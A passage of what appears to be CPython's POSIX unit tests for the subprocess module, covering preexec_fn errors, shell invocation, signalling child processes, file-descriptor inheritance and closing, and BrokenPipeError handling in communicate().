self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duplicating fds, if one of the fds involved is 0, 1 or 2, it can
# end up being overwritten (#12607). This tests all orderings of
# stdin/stdout/stderr.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest process's maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a couple of pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
